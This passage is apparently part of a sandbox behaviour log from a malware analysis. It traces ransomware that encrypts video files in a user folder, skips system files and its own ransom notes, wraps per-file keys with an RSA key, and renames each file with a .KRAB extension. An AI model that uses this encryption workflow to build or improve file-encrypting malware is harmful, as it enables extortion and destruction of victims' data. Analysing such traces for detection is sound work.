lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0099.110] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.114] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.114] CloseHandle (hObject=0x434) returned 1 [0099.114] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.115] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\LWv8Gyj-GU7qhFGKVALQ.mp4" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\lwv8gyj-gu7qhfgkvalq.mp4"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\LWv8Gyj-GU7qhFGKVALQ.mp4.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\lwv8gyj-gu7qhfgkvalq.mp4.krab")) returned 1 [0099.116] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.116] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.116] lstrcmpW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2=".") returned 1 [0099.116] lstrcmpW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2="..") returned 1 [0099.116] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="nGc3KZ_nMJWqHr6CmK.flv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nGc3KZ_nMJWqHr6CmK.flv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nGc3KZ_nMJWqHr6CmK.flv" [0099.116] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.117] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nGc3KZ_nMJWqHr6CmK.flv.KRAB") returned 56 [0099.117] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nGc3KZ_nMJWqHr6CmK.flv") returned 51 [0099.117] lstrlenW (lpString=".flv") returned 4 [0099.117] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.117] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".flv ") returned 5 [0099.117] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.117] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nGc3KZ_nMJWqHr6CmK.flv") returned 51 [0099.117] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nGc3KZ_nMJWqHr6CmK.flv") returned 51 [0099.117] lstrcmpiW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2="desktop.ini") returned 1 [0099.118] lstrcmpiW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2="autorun.inf") returned 1 [0099.118] lstrcmpiW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2="ntuser.dat") returned -1 [0099.118] lstrcmpiW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2="iconcache.db") returned 1 [0099.118] lstrcmpiW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2="bootsect.bak") returned 1 [0099.118] lstrcmpiW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2="boot.ini") returned 1 [0099.118] lstrcmpiW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2="ntuser.dat.log") returned -1 [0099.118] lstrcmpiW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2="thumbs.db") returned -1 [0099.118] lstrcmpiW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2="KRAB-DECRYPT.html") returned 1 [0099.118] lstrcmpiW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.118] lstrcmpiW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.118] lstrcmpiW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2="ntldr") returned -1 [0099.118] lstrcmpiW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2="NTDETECT.COM") returned -1 [0099.118] lstrcmpiW (lpString1="nGc3KZ_nMJWqHr6CmK.flv", lpString2="Bootfont.bin") returned 1 [0099.118] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.118] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010f08) returned 1 [0099.120] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.120] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.120] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.121] CryptGenRandom (in: hProv=0x1010f08, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0099.121] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0099.121] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.121] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1011678) returned 1 [0099.121] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.122] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.122] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.122] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0099.122] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0099.122] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.123] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0099.123] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0099.123] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.123] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.123] GetLastError () returned 0x0 [0099.123] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.124] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0099.124] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x10112c0) returned 1 [0099.124] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd920) returned 1 [0099.124] CryptGetKeyParam (in: hKey=0xfbd920, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.124] CryptEncrypt (in: hKey=0xfbd920, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.124] GetLastError () returned 0x0 [0099.124] CryptDestroyKey (hKey=0xfbd920) returned 1 [0099.124] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0099.125] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nGc3KZ_nMJWqHr6CmK.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\ngc3kz_nmjwqhr6cmk.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0099.125] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.126] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.150] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x1500b, lpOverlapped=0x0) returned 1 [0099.163] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffeaff5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.163] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x1500b, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x1500b, lpOverlapped=0x0) returned 1 [0099.164] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0099.165] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.168] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.169] CloseHandle (hObject=0x434) returned 1 [0099.169] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.169] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nGc3KZ_nMJWqHr6CmK.flv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\ngc3kz_nmjwqhr6cmk.flv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nGc3KZ_nMJWqHr6CmK.flv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\ngc3kz_nmjwqhr6cmk.flv.krab")) returned 1 [0099.170] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.170] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.170] lstrcmpW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2=".") returned 1 [0099.170] lstrcmpW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2="..") returned 1 [0099.170] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="nuK3RE6rv -7B-qIaU.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nuK3RE6rv -7B-qIaU.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nuK3RE6rv -7B-qIaU.mkv" [0099.170] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.170] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nuK3RE6rv -7B-qIaU.mkv.KRAB") returned 56 [0099.170] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nuK3RE6rv -7B-qIaU.mkv") returned 51 [0099.170] lstrlenW (lpString=".mkv") returned 4 [0099.170] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.171] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mkv ") returned 5 [0099.171] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.171] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nuK3RE6rv -7B-qIaU.mkv") returned 51 [0099.171] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nuK3RE6rv -7B-qIaU.mkv") returned 51 [0099.171] lstrcmpiW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2="desktop.ini") returned 1 [0099.171] lstrcmpiW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2="autorun.inf") returned 1 [0099.171] lstrcmpiW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2="ntuser.dat") returned 1 [0099.171] lstrcmpiW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2="iconcache.db") returned 1 [0099.171] lstrcmpiW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2="bootsect.bak") returned 1 [0099.171] lstrcmpiW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2="boot.ini") returned 1 [0099.171] lstrcmpiW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2="ntuser.dat.log") returned 1 [0099.171] lstrcmpiW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2="thumbs.db") returned -1 [0099.171] lstrcmpiW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2="KRAB-DECRYPT.html") returned 1 [0099.171] lstrcmpiW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.171] lstrcmpiW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.171] lstrcmpiW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2="ntldr") returned 1 [0099.171] lstrcmpiW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2="NTDETECT.COM") returned 1 [0099.171] lstrcmpiW (lpString1="nuK3RE6rv -7B-qIaU.mkv", lpString2="Bootfont.bin") returned 1 [0099.171] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.171] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10111b0) returned 1 [0099.172] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.172] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.176] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.176] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0099.176] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0099.176] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.179] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0099.180] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.180] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.180] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.180] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0099.180] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.180] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.181] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0099.181] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0099.181] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.181] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.182] GetLastError () returned 0x0 [0099.182] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0099.182] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0099.182] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011678) returned 1 [0099.182] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0099.182] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.182] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.183] GetLastError () returned 0x0 [0099.183] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0099.183] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0099.183] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nuK3RE6rv -7B-qIaU.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\nuk3re6rv -7b-qiau.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0099.183] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0099.183] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0099.184] ReadFile (in: hFile=0x434, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338f1fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338f1fc*=0x676a, lpOverlapped=0x0) returned 1 [0099.198] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xffff9896, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0099.198] WriteFile (in: hFile=0x434, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x676a, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338f1f8*=0x676a, lpOverlapped=0x0) returned 1 [0099.198] WriteFile (in: hFile=0x434, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338f1f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338f1f8*=0x208, lpOverlapped=0x0) returned 1 [0099.199] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.202] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.203] CloseHandle (hObject=0x434) returned 1 [0099.203] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.203] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nuK3RE6rv -7B-qIaU.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\nuk3re6rv -7b-qiau.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\nuK3RE6rv -7B-qIaU.mkv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\nuk3re6rv -7b-qiau.mkv.krab")) returned 1 [0099.205] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.205] FindNextFileW (in: hFindFile=0xfbd5a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0099.205] lstrcmpW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2=".") returned 1 [0099.205] lstrcmpW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2="..") returned 1 [0099.205] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\", lpString2="QeK8bVN5spGjBJbu.avi" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\QeK8bVN5spGjBJbu.avi") returned="C:\\Users\\CIiHmnxMn6Ps\\Videos\\QeK8bVN5spGjBJbu.avi" [0099.205] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0099.205] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Videos\\QeK8bVN5spGjBJbu.avi.KRAB") returned 54 [0099.205] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\QeK8bVN5spGjBJbu.avi") returned 49 [0099.205] lstrlenW (lpString=".avi") returned 4 [0099.205] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.206] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".avi ") returned 5 [0099.206] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.206] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\QeK8bVN5spGjBJbu.avi") returned 49 [0099.206] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Videos\\QeK8bVN5spGjBJbu.avi") returned 49 [0099.206] lstrcmpiW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2="desktop.ini") returned 1 [0099.206] lstrcmpiW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2="autorun.inf") returned 1 [0099.206] lstrcmpiW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2="ntuser.dat") returned 1 [0099.206] lstrcmpiW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2="iconcache.db") returned 1 [0099.206] lstrcmpiW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2="bootsect.bak") returned 1 [0099.206] lstrcmpiW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2="boot.ini") returned 1 [0099.206] lstrcmpiW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2="ntuser.dat.log") returned 1 [0099.206] lstrcmpiW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2="thumbs.db") returned -1 [0099.206] lstrcmpiW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2="KRAB-DECRYPT.html") returned 1 [0099.206] lstrcmpiW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2="KRAB-DECRYPT.txt") returned 1 [0099.206] lstrcmpiW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0099.206] lstrcmpiW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2="ntldr") returned 1 [0099.206] lstrcmpiW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2="NTDETECT.COM") returned 1 [0099.206] lstrcmpiW (lpString1="QeK8bVN5spGjBJbu.avi", lpString2="Bootfont.bin") returned 1 [0099.206] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0099.207] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x1010df8) returned 1 [0099.207] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.207] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.208] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.208] CryptGenRandom (in: hProv=0x1010df8, dwLen=0x20, pbBuffer=0x338f1cc | out: pbBuffer=0x338f1cc) returned 1 [0099.208] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.208] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.208] CryptAcquireContextW (in: phProv=0x338f134, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f134*=0x10114e0) returned 1 [0099.208] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0099.209] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0099.209] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0099.209] CryptGenRandom (in: hProv=0x10114e0, dwLen=0x8, pbBuffer=0x338f1ec | out: pbBuffer=0x338f1ec) returned 1 [0099.209] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0099.209] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.209] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1011898) returned 1 [0099.210] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd3e0) returned 1 [0099.210] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.210] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.210] GetLastError () returned 0x0 [0099.210] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0099.210] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0099.210] CryptAcquireContextW (in: phProv=0x338f12c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338f12c*=0x1010df8) returned 1 [0099.211] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338f130 | out: phKey=0x338f130*=0xfbd7a0) returned 1 [0099.211] CryptGetKeyParam (in: hKey=0xfbd7a0, dwParam=0x8, pbData=0x338f124, pdwDataLen=0x338f128, dwFlags=0x0 | out: pbData=0x338f124*=0x800, pdwDataLen=0x338f128*=0x4) returned 1 [0099.211] CryptEncrypt (in: hKey=0xfbd7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338f15c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338f15c*=0x100) returned 1 [0099.211] GetLastError () returned 0x0 [0099.211] CryptDestroyKey (hKey=0xfbd7a0) returned 1 [0099.211] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0099.211] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Videos\\QeK8bVN5spGjBJbu.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\videos\\qek8bvn5spgjbjbu.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0099.212] VirtualAlloc (lpAddress=0x0, 